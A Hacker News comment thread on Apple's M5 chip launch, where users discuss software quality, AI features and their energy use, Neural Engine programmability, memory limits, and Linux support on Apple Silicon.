I’m still daily driving my M1 Max and have no reason to upgrade for a long time. There’s really nothing in my workflow that could be markedly improved performance wise. There’s only thing is maybe more ram as the need for that keeps growing - I’m isn’t just under 30 when running a bunch of containers.
SkyPuncher•4h ago
There are so many software related things that drive me absolutely loony with Apple right now.

* My iPhone as a remote for my Apple TV has randomly stopped deciding it can control the volume - despite the "Now Playing" UI offering an audio control that works.

There auth screens drive me crazy:

* Why cannot I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't gong to work, stop making me wait.

* Likewise, on Apple TV the parental control input requires me to explicitly choose to enter a Pin Code. Why? Just show me the Pin Code screen. If I can approve from my device, I will.

  * Similarly, if I use my phone as a remote, why do I need to manually click out of the remote to get to the parental control approval screen. I'm literally using my phone. Just auto-approve.
strbean•2h ago
> * Why cannot I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't gong to work, stop making me wait.

Funny, a similar thing has been driving me crazy on my Ubuntu 20.04 laptop with fingerprint login. When unlocking, I can either enter a password or use fingerprint. On boot, I am not allowed to enter a password until I fail with fingerprint. If I use fingerprint to log in on boot, I have to enter my password anyways once logged in to unlock my keychain.

I should probably just figure out a way to disable fingerprint on boot and only use it for the lock screen.

prettymuchnoone•1h ago
I think this is a GNOME thing...the keychain by default has the same password as the login password, so logging in with the password unlocks it too. fingerprint login doesn't unlock it: https://news.ycombinator.com/item?id=38527876, https://wiki.archlinux.org/title/GNOME/Keyring
sotix•2h ago
Why can I not use my password manager for my Apple ID but can use it for any other password field? Instead I have to switch to my password manager, copy the password, reopen the App Store, select get app, and paste the password in the Apple ID login pop up in the 10 seconds before my password clears from my clipboard.
mschuster91•1h ago
Been ages but I think you can mitigate that annoyance by approving fingerprint purchases.
sgt•2h ago
I highly recommend the Apple remote .. then you also don't need to take your phone with you when you are watching TV, which is an added benefit for some.

Of course the thin Apple remote has a way of getting lost, but it has a Find Me feature which locates it pretty well.

SkyPuncher•2h ago
Remote is fine, but it's always stuck in a couch cushion.
sgt•1h ago
Same here.. so we use that Find Remote functionality about once a month! Without it we'd be lost. Business idea: Make a cover for the Apple remote that makes it bigger and harder to lose.
K7PJP•29m ago
There was a company or two that made cases for the older Apple remotes with the express purpose of making them larger, which I always thought was kind of funny. I would buy one for the current remote if one existed.
gxs•2h ago
As someone who jumped in the apple bandwagon at peak apple and hasn’t been through all their ups and downs the way some die hards have been, it’s been super aggravating dealing with apples shit lately - not what I signed up for all those years ago

It seems to have been degrading for a long time, but for me it’s been in this past year where it’s crossed into that threshold android used to live in where using the phone causes a physiological response from how aggravating it can be sometimes

I let my guard down and got too deep into the apple ecosystem- I know better and always avoided getting myself into these situations in the last, but here I am

The phone sucks right now - super buggy and they continue to remove/impose features that should be left as an option to the user By Yes, this has always been the knock on apple, but I typically havent had an issue with their decisions - it’s just so bad now

Lesson (re)learned and I will stay away from ecosystems - luckily the damage here is only for media

The minute I can get blue bubbles reliably on an android, I’ll give the pixel a shot again - if that sucks too then maybe I’ll go back to my teenage years and start rooting devices again

skinnymuch•2h ago
How would you ever get blue bubbles reliably on Android? Are you talking about iMessage or something else?

I am fully bought into the Apple ecosystem. Not sure yet if I regret it. It is annoying to be so tied down to one company that isn’t going the way I want it to.

gxs•9m ago
Yeah iMessage - over the years there have been “breakthroughs” - people find nifty workarounds or have even reverse engineered the iMessage protocol, but for whatever reason nothing ever sticks

There are current workarounds, like isn’t your home Mac as a relay, but nothing super elegant that I know of

SkyPuncher•1h ago
So, I still think the experience is generally better and more integrated than when I was on an Android device. I just find they're generally not really paying attention to user details the way they have in the past.
sample2•1h ago
I see the same bug with the remote on my phone, how did they manage to break volume control in the app while keeping it working from the lock screen “now playing”?

I’ve also been unable to get the remote app on my watch to work at all. It’s hard to imagine people working at Apple don’t also run into these issues all the time.

thenaturalist•3h ago
Don't kidd yourself: Planned obsolescence is real.

Apple has a higher duty to their shareholders than to their customers.

Not hating on Apple, just stating the hard economic truth.

random3•2h ago
This needs benchmarks.

Sad if true. I feel my M1 max sluggish too lately. After bragging that this was the longest lived work machine I had and thinking I'm good to wait for M6. This is not good for business, but IMO you need more than raw power to justify upgrades even for professional use - form factor, screen quality, battery, etc.

I think they bet a lot of hardware money on AI capabilities, but failed to deliver the software, so there was no real reason to upgrade because of AI features in the chip (which is literally what they boast on the first line of the announcement - yet nobody cares about making more cute faces)

It's not 100% their fault. Everyone got onto the LLM bandwagon like it's "the thing" so even if they didn't believe it they sill needed something. Except an OS is not a chat interface, and LLMs do suck at stricter things.

lawlessone•2h ago
>The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers

a rant on my part, but a computer from 10 years ago would be fine for what most people do on their computer, only for software bloat..

JumpCrisscross•2h ago
> Tahoe however makes my M1 Air feel sluggish

Counterpoint: my M1 Pro was a turtle for a few weeks and then stopped doing nonsense in the background and is back to its zippy self. (Still buggy. But that would be true on new hardware, too.)

quadyeast•1h ago
mediaanalysisd has been consuming ~140% CPU since upgrading a few weeks ago. I just turned off Apple Intelligence and it dropped to 0%.
seunosewa•2h ago
My M1 Air got very sluggish after upgrading to Tahoe but then it started behaving normally after a couple of days. Hopefully, you'll experience the same soon.
comboy•17m ago
It's definitely happening with watches and maybe phones after system upgrade, mostly perceivable through the battery drain - does anybody know what is happening under the hood? I understand if they changed some way of indexing data or something but it's after every major OS upgrade.
antipaul•2h ago
Which is harder these days, software or hardware?
DSingularity•1h ago
Each challenging in their own ways. The real challenge is that we need codesign and that’s the tricky part.
kwanbix•2h ago
I really wish apple sold the Mx to others like Lenovo.

I would love to se a ThinkPad with an M5 running Linux.

fph•1h ago
What is the Linux experience on new Mac hardware? I'd be interested also in running a Macbuntu.
bmdhacks•1h ago
Asahi linux is essentially in a holding pattern with only support up to M2. Likely linux will never be supported above M2 and even M2 has a lot of rough edges. When my monitor sleeps on M2 linux it can never reawaken without a reboot.
greg5green•2h ago
>The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

Is that good? Their cellular modems have been terrible. I'll reserve judgement until trying one out.

>The M1 itself is so powerful

I think this is a bit of a fallacy. Apple Silicon is great for the power consumption to power ratio, but something like a Ryzen 9 7945HX can do 3x more work than an M1 Max. And a non-laptop chip, like an Intel Core Ultra 7 265k can do 3.5x.

wizee•1h ago
Those ratios seem way off if you're referring to the M1 Max and not the base M1. If we use Geekbench CPU performance, the Ryzen 9 7945HX (which is from 2023) is around 12% faster single core and 32% faster multicore than the M1 Max (which is from 2021). If you look at the 2024 M4 Max, it's substantially faster than the Ryzen and Intel you mentioned.

https://browser.geekbench.com/processors/amd-ryzen-9-7945hx

https://browser.geekbench.com/processors/intel-core-ultra-7-...

https://browser.geekbench.com/macs/macbook-pro-16-inch-2021-...

https://browser.geekbench.com/macs/macbook-pro-16-inch-2024-...

Avamander•45m ago
Having a cellular modem on a MacBook would be really handy even if it's not perfect.
n8cpdx•42m ago
Source re:modem claims? Performance seems fine in general, modestly slower on very high end networks but using 25% less power.

Performance claims:

https://www.ookla.com/articles/iphone-c1-modem-performance-q...

Energy claims:

https://appleinsider.com/articles/25/02/27/apples-c1-modem-b...

phamduongtria•1h ago
Even the M4 Max MacBook, I tried in the stores were running like shit on Tahoe
port11•1h ago
It's incredible what the hardware teams at Apple have been doing. I imagine they also feel let down by the software that's driving these beasts. It's as if they're 2 completely different companies.
kenjackson•35m ago
The latest iPhone OS (iOS 26) is embarrassing. The number of glitches and amount of UI sloppiness is crazy for a company that historically prided itself on the details. It's the first major iOS update I've taken that just seems almost strictly worse than its predecessor.
wartywhoa23•1h ago
> ...The <thing I own right now> is so powerful that nobody really needs to upgrade...

I keep hearing this since the Intel 486DX times, and

> Nobody will ever need more than 640K of RAM!

bombcar•58m ago
This is the first time I’ve gone four+ years without even a real desire to upgrade, I have a hard time figuring out even what would be faster.

Amusingly enough, adding more ports could do it.

dimal•11m ago
Seems like the software teams are there to simply squander the extra processing power that the hardware teams provide, thus ensuring recurring revenue. I see no good reason to upgrade to Tahoe. I’d have to buy a new computer just so I could power transparencies that I don’t want.
jadbox•6h ago
... no benchmarks?
nake13•6h ago
It seems this generation focuses more on GPU and AI acceleration rather than CPU. The M5 chip allows Apple Vision Pro to render 10% more pixels and operate at up to 120 Hz. It delivers up to four times the peak GPU compute performance compared with M4, provides 30% higher graphics performance, and offers 15% faster multithreaded CPU performance.
Noaidi•6h ago
I am wondering if Apple's focus is off lately with this drive for AI. So far all they are showing in that presentation is that I can have

"the ability to transform 2D photos into spatial scenes in the Photos app, or generating a Persona — operate with greater speed and efficiency."

And by making Apple AI (which is something I do not use for many reasons, but mainly because of Climate Change) their focus, I am afraid they are losing and making their operating Systems worse.

For instance, Liquid Glass, the mess I was lucky enough to uninstall before they put in the embargo against doing so, is, well, a mess. An Aplha release in my opinion which I feel was a distraction from their lack of a robust AI release.

So by blowing money on the AI gold rush that they were too late for, will they ultimately ruin their products across the board?

I am currently attempting to sell my iPhone 16E and my M1 Macbook Air to move back to Linux because of all of this.

steinvakt2•5h ago
If you don’t use AI for climate reasons then you should read the recent reports about how little electricity and water is actually used. It’s basically zero (image and video models excluded). Your information about this is probably related to GPT3.5 or something. Which is now 3 years old - a lifetime in AI world.
greekrich92•5h ago
Big data centers running tons of GPUs and the construction of even bigger ones is not carbon neutral come on
wat10000•5h ago
Don't newer models use more energy? I thought they were getting bigger and more computationally intensive.
trenchpilgrim•5h ago
They use a massive amount of energy during training. During inference they use a tiny amount of energy, less than a web search (turns out you can be really efficient if you don't mind giving wrong answers at random, and can therefore skip expensive database queries!)
wat10000•4h ago
Right, but the comment I was responding to suggested that ChatGPT3.5 used lots of energy and newer models use less.
trenchpilgrim•1h ago
Indeed, this is correct. See today's Claude Haiku 4 announcement for an example.
imcritic•5h ago
I think they will continue ruining their products via software updates. That's implied by a walled garden approach they chose to do their business: this forces users to consoom more and thus generates profits. Apple isn't a "lean" company, it needs outrageous profits to stay afloat.
StopDisinfo910•5h ago
> making Apple AI [...] their focus

Are they really doing that? Because if it's the case they have shockingly little to show for it.

Their last few attempts at actual innovation seem to have been less than successful. The Vision Pro failed to find a public. Liquid Glass is to put it politely divisive.

At that point to me, it seems that good SoC and a captive audience in the US are pretty much all they have remaining and competition on the SoC part is becoming fierce.

Noaidi•4h ago
Yeah, I agree, they have a captive audience for sure. But they still need to satisfy share holders. If people are failing to upgrade that is a problem. And the battery drain on my iPhone 16e on Glass was horrific. I know casual users who did not notice until I pointed it out and they were tracking it better. This, unfortunatly, makes me think conspiratorially. Even a modest about of extra battery use and degradation will mean more upgrades in the future.

But I think $500 billion is a lot of money for AI:

Apple accelerates AI investment with $500B for skills, infrastructure

https://www.ciodive.com/news/Apple-AI-infrastructure-investm...

Imagine using $500 for the operating system and squashing bugs or making the system even more energy efficient? Or maybe figuring out how to connect to an android tablet's file system natively?

knotimpressed•5h ago
Assuming you've read https://andymasley.substack.com/p/a-cheat-sheet-for-conversa... or the longer full essay/related works, could you elaborate on why you don't use Apple Intelligence?

I totally understand why someone would refuse to use it due to environmental reasons (amongst others) but I'm curious to hear your opinions on it.

pcdoodle•5h ago
For me: unproven trust and no killer feature.

If I can't search my Apple Mail without AI, why would I trust AI?

sylens•5h ago
> could you elaborate on why you don't use Apple Intelligence?

Why would I trust this when they can't deliver a voice assistant that can parse my sentences beyond "Set a reminder" or "Set a timer"? They have neglected this area of their products for over a decade, they are not owed the benefit of the doubt

Noaidi•4h ago
Some commenters already answered for me. To me there is no real use benefit. I am rather a simple user and it seems to take up space on the phone as well. I refuse to use iCloud so space is important to me since photography is what I do the most.

Also, I like researching things old school how I learned in college because I think it leads to unintended discoveries.

I do not trust the source you linked to. It is an organization buried under organizations for which I cannot seem to find their funding source after looking for a good 15 minutes this morning. It led me back to https://ev.org/ where I found out one guy used to work for "Bain and Company", a consulting firm, and was associated with FTX funding:

https://oxfordclarion.uk/wytham-abbey-and-the-end-of-the-eff...

Besides "Effective Altruism" makes no sense to me. Altruism is Altruism IMO.

Altruism: unselfish regard for or devotion to the welfare of others

There is no way to be ineffective at altruism. The more you have to think about altruism the further you get from it.

But the organization stinks as some kind of tech propaganda arm to me.

timeon•4h ago
Not sure why would one think that article is something other than distraction attempt. Because emissions are adding up.

I'm from country (in Europe) where CO2 emissions per capita [0] are 5.57 while number for USA is 14.3, so reading this sentence in that article: "The average American uses ~50,000 times as much water every day..." surly does not imply that one should use ChatGPT because it is nothing. If "average American" wants to decrease emissions then not using LLMs is just start.

[0]: https://ourworldindata.org/grapher/co-emissions-per-capita

adastra22•57m ago
> I totally understand why someone would refuse to use it due to environmental reasons

Huh. This one baffles me.

jeffbee•4h ago
I'm interested in reading about your low-carbon lifestyle that is so efficient you got to the point of giving up machine inference.
timeon•4h ago
Depends where you are. People in some countries have lot of catching up: https://ourworldindata.org/grapher/co-emissions-per-capita

Maybe they are in USA - every little think counts there.

Noaidi•3h ago
I am in the US, and thanks for that link. I am of the opinion that the Climate Crisis should be the number one focus for everyone right now.

So, to keep this on point, Apple making a faster chip is not on my climate change agenda and anything but negative.

jeffbee•3h ago
No, in the USA it is the opposite. The little things do not and cannot add up to anything. The only things that make a difference are motor fuels and hamburgers.
Noaidi•3h ago
I live in a van full time. I have a 200w solar panel and a 1500w output solar battery that powers everything I use, mostly for cooking, sometimes heat. I also poop in the woods a lot. :) I do not use the internet much really. Driving is my biggest carbon footprint but I really do not put much more mileage than the average suburban person. Anyway, I try my best. I am permanently disabled so that makes a lot of it easier. Being poor dramatically lowers ones carbon footprint.
jeffbee•3h ago
If you drive a van as much as the average suburbanite drives their vehicle, emitting ~10 metric tons of CO2 annually, posting about how you gave up local machine inference for the climate is performative and asinine. Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less.
leakycap•1h ago
What a nice way to talk to another person who... didn't attack you?

A typical passenger car driving 12,000 miles puts out about 5 metric tons of C02

The person driving that passenger car likely has a 1,000 sq ft or larger home or apartment, which can vary widely but could be reasonably estimated at another 5 metric tons of C02 (Miami vs. Minnesota makes a huge difference)

So we're at 10 metric tons for someone who doesn't live in a van but still drives like a suburbanite

Care to be a little kinder next time you feel whatever compelled you to write you response to the other user? Jeesh.

Noaidi•10m ago
First, I need my van. My van is my house.

> Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less

Still, even lets say your number are correct (and I feel they are not), does that mean I should just add to the problem and use something I do not need?

Driving my van for my yearly average creates about 4.4 metric tons of CO2.

"A more recent study reported that training GPT-3 with 175 billion parameters consumed 1287 MWh of electricity, and resulted in carbon emissions of 502 metric tons of carbon, equivalent to driving 112 gasoline powered cars for a year."

https://news.climate.columbia.edu/2023/06/09/ais-growing-car...

Just to get an idea of how I conserve, another example is I only watch videos in 480 becasue it uses less power. This has a double benefit for me since it saves my solar battery as well.

I am not bragging, just showing what is possible. Right now, being tsill this week in the desert, my carbon footprint is extremely low.

Second, I cannot really trust most numbers that are coming out regarding AI. Sorry, just too much confusion and green-washing. For example, Meta is building an AI site that is about the size of Manhattan. Is all the carbon used to build that counted in the equations?

But this paper from 5/25:

https://www.technologyreview.com/2025/05/20/1116327/ai-energ...

says "by 2028 more than half of the electricity going to data centers will be used for AI. At that point, AI alone could consume as much electricity annually as 22% of all US households."

And

"Tallies of AI’s energy use often short-circuit the conversation—either by scolding individual behavior, or by triggering comparisons to bigger climate offenders. Both reactions dodge the point: AI is unavoidable, and even if a single query is low-impact, governments and companies are now shaping a much larger energy future around AI’s needs."

And

"The Lawrence Berkeley researchers offered a blunt critique of where things stand, saying that the information disclosed by tech companies, data center operators, utility companies, and hardware manufacturers is simply not enough to make reasonable projections about the unprecedented energy demands of this future or estimate the emissions it will create. "

So the confusion and obfuscation is enough for me to avoid it. I think AI shoudl be restaind to research, not to be used from most of the silliness adn AI slop that is being produced. Because yiou know, we are not even counting the AI slop views that also take up data space and energy by people looking at it all.

But part if why I do not use it is my little boycott. I do not like AI, at least how it is being misused to create porn and AI slop instad of doing the great things it might do. They are misusing AI to make a profit. And that is also what I protest.

Tagbert•2h ago
Most of the AI and Machine Learning Apple has done so far are primarily done on device so you can see whether there is any climate change concern or not.
GaggiX•6h ago
>The 10-core GPU features a dedicated Neural Accelerator in each core

"The neural engine features a graphic accelerator" probably M6

h1fra•5h ago
I keep seeing all those crazy screenshots from games on Mac, and yet there are barely any big releases for this platform. I guess it benefits a whole range of software, not just games, but still that's a pity.
tantalor•5h ago
Because gaming on Mac actually looks bad in practice.

https://news.ycombinator.com/item?id=44906305

qnpnp•3h ago
This is easy to fix, not an explanation.

Gaming on mac is indeed lacking, but that's really not the reason.

tantalor•1h ago
It's a symptom of the deeper problem: Apple does not value game developers or the experience of users.
SXX•5h ago
32GB RAM limit on current M5 models. Now wait for M5 Max.
bombcar•5h ago
M5 Max Macs

If they're studios, you can have stacks of M5 Max Macs.

gmm1990•5h ago
Interesting that there's only the m5 on the macbook pro. I thought the m4 and m4 pro/max were at the same time on the macbook pro
jbjbjbjb•5h ago
I’m glad I opted to get the base model M4 Mac Mini rather than upgrade the memory for longevity.
mohsen1•5h ago
First time seeing Apple using "AI" in their marketing material. It was "Machine Learning" and "Apple Intelligence" before...
mentalgear•5h ago
Unfortunately, they have also succumbed to the AI hype machine. Apple, calling it by its actual name "machine learning" was about the only thing I still liked about Apple.
rpdillon•5h ago
Wait, didn't they try to backronym their way into "Apple Intelligence" last cycle?

https://www.apple.com/apple-intelligence/

kryllic•5h ago
Probably don't want to draw more attention to their ongoing lawsuits [1]. Apple, for all its faults, does enjoy consistency and the unruly nature of LLM's is something I'm shocked they thought they could tame in a short amount of time. The fallout of the hilariously bad news/message "summaries" were more than enough to spook Apple from allowing that to go much further.

>Built into your iPhone, iPad, Mac, and Apple Vision Pro* to help you write, express yourself, and get things done effortlessly.** Designed with groundbreaking privacy at every step.

The asterisks are really icing on the cake here.

---

[1] https://news.bloomberglaw.com/ip-law/apple-accused-of-ai-cop...

kgwgk•5h ago
> actual name "machine learning"

Yesterday’s hype is today’s humility.

adastra22•1h ago
Machine learning is a bit more specific than what we now call AI, no?
low_tech_punk•5h ago
Not all is lost: AI can still be acronym for Apple Intelligence.
vessenes•4h ago
I like sniping - but I could make a product call here to support the messaging - when it's running outside diffusion models and LLMs (as per the press release) we could call that AI. Agreed that they should at least have mentioned Apple Intelligence in their PR though
vayup•3h ago
I am sure by AI they mean Apple Intelligence:-)
lenerdenator•5h ago
Now if some game companies would just port their wares to Apple Silicon and the MacOS libraries already...
zoobab•5h ago
Does it run Linux?
sameermanek•5h ago
Did anyone else notice that the base storage has been upgraded to 512G? I knew this was coming after iPhone 17s storage upgrade!
xd1936•5h ago
512GB was the base storage of the M4 also.

https://web.archive.org/web/20251010205008/https://www.apple...

criddell•4h ago
Looks like the base storage on the iPad Pro is still 256 GB.
Tepix•4h ago
This is the Macbook Pro, not the Macbook Air.
gzer0•5h ago
M5 Chip currently only avaialble with up to 32 GB of RAM on the 14 inch Macbook pro variant, just FYI.

[1] https://www.apple.com/us-edu/shop/buy-mac/macbook-pro/14-inc...

pixelpoet•5h ago
That's laughable in 2025, and together with the wimpy 153 GB/s memory bandwidth (come on, Strix Halo is 256GB/s at a fraction of the price!) they really don't have a leg to stand on calling this AI-anything!
hannesfur•4h ago
As pointed out in other places as well a better comparison will be the upcoming Pro & Max variants. Also, as far as I know, Strix Halo mainly uses the GPU for inference not the little AI accelerator AMD has put on there. That one is just to limited.
Tepix•4h ago
So you're saying these won't sell at all?
pixelpoet•4h ago
I'm saying this is pretty weaksauce for AI-anything in 2025, especially considering the price tag. Sure, there will be later models with more memory and bandwidth (no doubt at eye-watering prices), but with 32 GB this model isn't it.

I'm sure it's a perfectly fine daily driver, but you have to appreciate the irony of a massive chip loaded to the gills with matrix multiplication units, marketed as an amazing AI machine, and yet so hobbled by mem capacity and bandwidth.

jon-wood•5h ago
> Apple 2030 is the company’s ambitious plan to be carbon neutral across its entire footprint by the end of this decade by reducing product emissions from their three biggest sources: materials, electricity, and transportation.

But never, ever, through not shipping incremental hardware bumps every year regardless of whether there's anything really worth shipping.

Cthulhu_•5h ago
I'm always skeptical about these carbon neutral pledges because in practice it's a lot of administrative magic, like paying a company that says they will plant trees or whatever which will sign some official looking paper saying 'ye apple totaly compensated three morbillion tonnes of carbon emissions'.

And it's things like not including a charger, cable, headphones anymore to reduce package size, which sure, will save a little on emissions but it's moot because people will still need those things.

asdhtjkujh•4h ago
Very few people are buying a new machine every year, even when the updates (like this year) are arguably more than incremental — selling outdated hardware that will become obsolete sooner is not more environmentally-friendly.

Hardware longevity and quality are probably the least valid criticisms of the current Macbook lineup. Most of the industry produces future landfill at an alarming rate.

SG-•4h ago
second hand Apple market is very big, especially since M series MacBooks leapfrogged performance.
sebastianconcpt•5h ago
Wonder how it compares with the M4 Max that I've just bought haha
dmix•5h ago
Same I just bought an M4 Max 2 weeks ago and had a bit of anxiety for a moment. I'm going to justify it because they haven't released M5 Max yet
sebastianconcpt•5h ago
It's going to be fine, what's important is what we do with the thingy :)

Logos is King

whitepoplar•5h ago
Any word on whether this chip has "Memory Integrity Enforcement" capability, as included in Apple's A19/A19 Pro chips?

https://security.apple.com/blog/memory-integrity-enforcement...

SG-•4h ago
it's the same core, so more than likely yes.
gcr•5h ago
So how many hardware systems does Apple silicon have for doing matrix multiplies now?

1. CPU, via SIMD/NEON instructions (just dot products)

2. CPU, via AMX coprocessor (entire matrix multiplies, M1-M3)

3. CPU, via SME (M4)

4. GPU, via Metal (compute shaders + simdgroup-matrix + mps matrix kernels)

4. Neural Engine via CoreML (advisory)

Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

hannesfur•5h ago
I inferred that they meant the neural engine cores by neural accelerators or it could be a bigger/different AMX (which really should become a standard btw)
oskarkk•3h ago
Would it be possible to use all of them at the same time? Not necessarily in a practical way, but just for fun? Could different ways of doing this on CPU be done in some extent by one core at the same time, given it's superscalar?
staticfloat•2h ago
This is a very old answer about the M1, but yes what you’re saying is possible: https://stackoverflow.com/a/67590869/230778
nullbyte•2h ago
Thankfully I think libraries like Pytorch abstract this stuff away. But it seems very convoluted if you're building something from the ground up.
gardnr•50m ago
Does PyTorch support other acceleration? I thought they just support Metal.
twoodfin•1h ago
Is this really strange? Matmul is just a specialized kind of primitive compute, one that is seeing an explosion in practical uses.

A Mac Quadra in 1994 probably had floating point compute all over the place, despite the 1984 Mac having none.

jmrm•1h ago
I wonder if some Apple-made software, like Final Cut, make use of all of those "duplicated" instructions at the same time for getting a better performance...

I know how just the multitasking nature of the OS probably make this situation happens across different programs, but nonetheless would be pretty cool!

HeckFeck•53m ago
Adding CPUs and GPUs on top of your CPUs and GPUs... Sounds like we've the spiritual successor of the Sega Saturn.
throwaway31131•29m ago
Doesn’t that make sense though as each manipulates a different layer in the memory hierarchy allowing the programmer to control the latency and throughput implications. I see it as a good thing.
hannesfur•5h ago
It’s unfortunate that this announcement is still unspecific about what they improved in the Neural Engine. Since all we know about the Neural Engine comes from Apple papers or reverse engineering efforts (https://github.com/hollance/neural-engine), it’s plausible that they addressed some quirks to enable better transformer performance. They have written quite interesting papers on transformers on the Neural Engine:

- https://machinelearning.apple.com/research/neural-engine-tra...

- https://machinelearning.apple.com/research/vision-transforme...

Things have definitely gotten better with MLX on the software side, though it still seems they could do more in that area (let’s see what the M5 Max brings). But even if they made big strides here, it won’t help previous generations, and the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

fooblaster•5h ago
MLX doesn't use the neural engine still right? I still wish they would abandon that unit and just center everything around metal and tensor units on the GPU.
zozbot234•5h ago
Wrt. language models/transformers, the neural engine/NPU is still potentially useful for the pre-processing step, which is generally compute-limited. For token generation you need memory bandwidth so GPU compute with neural/tensor accelerators is preferable.
fooblaster•5h ago
I think I'd still rather have the hardware area put into tensor cores for the GPU instead of this unit that's only programmable with onnx.
hannesfur•4h ago
Oh, I overlooked that! You are right. Surprising… since Apple has shown that it’s possible through CoreML (https://github.com/apple/ml-ane-transformers)

I would hope that the Foundation Models (https://developer.apple.com/documentation/foundationmodels) use the neural engine.

hannesfur•4h ago
Edit: Foundation Models use the Neural Engine. They are referring to a Neural Engine compatible K/V cache in this announcement: https://machinelearning.apple.com/research/introducing-apple...
fooblaster•4h ago
The neural engine not having a native programming model makes it effectively a dead end for external model development. It seems like a legacy unit that was designed for cnns with limited receptive fields, and just isn't programmable enough to be useful for the total set of models and their operators available today.
hannesfur•3h ago
That's sadly true, over in x86 land things don't look much better in my opinion. The corresponding accelerators on modern Intel and AMD CPUs (the "Copilot PCs") are very difficult to program as well. I would love to read a blog post on someone trying though!
fooblaster•2h ago
I have a lot of the details there. Suffice to say it's a nightmare:

https://www.google.com/url?sa=t&source=web&rct=j&opi=8997844...

AMD is likely to back away from this IP relatively soon.

llm_nerd•3h ago
MLX is a training/research framework, and the work product is usually a CoreML model. A CoreML model will use any and all resources that are available to it, at least if the resource fits for the need.

The ANE is for very low power, very specific inference tasks. There is no universe where Apple abandons it, and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs. The ANE is how your iPhone extracts every bit of text from images and subject matter information from photos with little fanfare or heat, or without destroying your battery, among many other uses. It is extremely useful for what it does.

>tensor units on the GPU

The M5 / A19 Pro are the first chips with so-called tensor units. e.g. matmul on the GPU. The ANE used to be the only tensor-like thing on the system, albeit as mentioned designed to be super efficient and for very specific purposes. That doesn't mean Apple is going to abandon the ANE, and instead they made it faster and more capable again.

almostgotcaught•3h ago
> the work product is usually a CoreML model.

What work product? Who is running models on Apple hardware in prod?

llm_nerd•3h ago
An enormous number of people and products. I'm actually not sure if your comment is serious, because it seems to be of the "I don't, therefore no one does" variety.
bigyabai•3h ago
Enormous compared to what? Do you have any numbers, or are you going off what your X/Bluesky feed is telling you?
llm_nerd•3h ago
I'm super not interested in arguing with the peanut gallery (meaning people who don't know the platform but feel that they have absolute knowledge of it), but enough people have apps with CoreML models in them, running across a billion or so devices. Some of those models were developed or migrated with MLX.

You don't have to believe this. I could not care less if you don't.

Have a great day.

bigyabai•3h ago
I don't believe it. MLX is a proprietary model format and usually the last to get supported on Huggingface. Given that most iOS users aren't selecting their own models, I genuinely don't think your conjecture adds up. The majority of people are likely using safetensors and GGUF, not MLX.

If you had a source to cite then it would remove all doubt pretty quickly here. But your assumptions don't seem to align with how iOS users actually use their phone.

llm_nerd•3h ago
Cite a source? That CoreML models are prolific on Apple platforms? That Apple devices are prolific? Search for it yourself.

You seem set on MLX and apparently on your narrow view of what models are. This discussion was about ANE vs "tensor" units on the GPU, and someone happened to mention MLX in that context. I clarified the role of MLX, but that from an inference perspective most deployments are CoreML, which will automatically use ANE if the model or some subset fits (which is actually fairly rare as it's a very limited -- albeit speedy and power efficient -- bit of hardware). These are basic facts.

>how iOS users actually use their phone.

What does this even mean? Do you think I mean people are running Qwen3-Embedding-4B in pytorch on their device or something? Loads of apps, including mobile games, have models in them now. This is not rare, and most users are blissfully unaware.

kanaffa12345•2h ago
> That CoreML models are prolific on Apple platforms? That Apple devices are prolific?

correct and non-controversial

> An enormous number of people and products [use CoreML on Apple platforms]

non-sequitur

EDIT: i see people are not aware of

https://en.wikipedia.org/wiki/Simpson%27s_paradox

kanaffa12345•3h ago
> I'm super not interested in arguing with the peanut gallery

i love blustery nerds lol. what if i told you i'm a coreml contrib and i know for a fact you're wrong?

llm_nerd•2h ago
Logging into the alt for this? Good god.

It would help if you would explain what I said that is wrong. You know, as the "haven't logged in in three years but pulled out the alt for this" CoreML contributor you are. This is an especially weird bit of trolling giving that nothing I said is remotely even contentious, and is utterly banal facts.

koolala•2h ago
Can you share a example of apps you mean any maybe it would clear up any confusion?
zozbot234•3h ago
> ...and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs

That seems like a strange comment. I've remarked in this thread (and other threads on this site) about what's known re: low-level ANE capabilities, and it seems to have significant potential overall, even for some part of LLM processing. I'm not expecting it to be best-in-class at everything, though. Just like most other NPUs that are also showing up on recent laptop hardware.

trymas•5h ago
> the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

As you said - it won’t help previous generations, though since last year (or two??) all macs start with 16GB of memory. Even entry level macbook airs.

hannesfur•4h ago
Thats true! I was referring to their wider line up, especially the iPad, where users will expect the same performance as on the Mac’s (they payed for an Mx chip) and they sold me an iPad Air this year that comes with a really fast M3 and still only 8 GB of RAM (you only get 16 on the iPad Pro btw if you go with at least 1TB of storage on the M4 Pro one)
moi2388•4h ago
Why would you expect the same performance on iPad and MacBook Pro?

The latter has up to 128GB of memory?

hannesfur•4h ago
You probably wouldn’t with a Pro but you might between an iPad Pro and an MacBook Air. With the foundation models API they basically said that there will be one size of model for the entire platform, making smarter models on a MacBook Pro unrealistic and only faster ones possible.
LoganDark•4h ago
Isn't Private Cloud Compute already enabling the more powerful models to be run on the server? That way the on-device models don't have as much pressure to be The One.
moi2388•4h ago
That’s fair
doug_durham•1h ago
"They sold me"? You me you bought.
raverbashing•3h ago
I bet Cook authorized the upgrade with grinned teeth and I was all for it
liuliu•4h ago
Faster compute helps, for things like vision language model that requires bigger context to be filled. My understanding is that ANE is still optimized for convolution load, and compute efficiency while the new neural accelerators optimized for flexibility and performance.
zozbot234•4h ago
The old ANE enabled arbitrary statically scheduled multiply-add, of INT8 or FP16. That's good for convolution but not specifically geared for it.
liuliu•3h ago
I am not an expert on ANE, but I think it is related to the size of register files and how that is smaller than what we need for GEMM on modern transformers (especially these fat ones with MoE).
zozbot234•3h ago
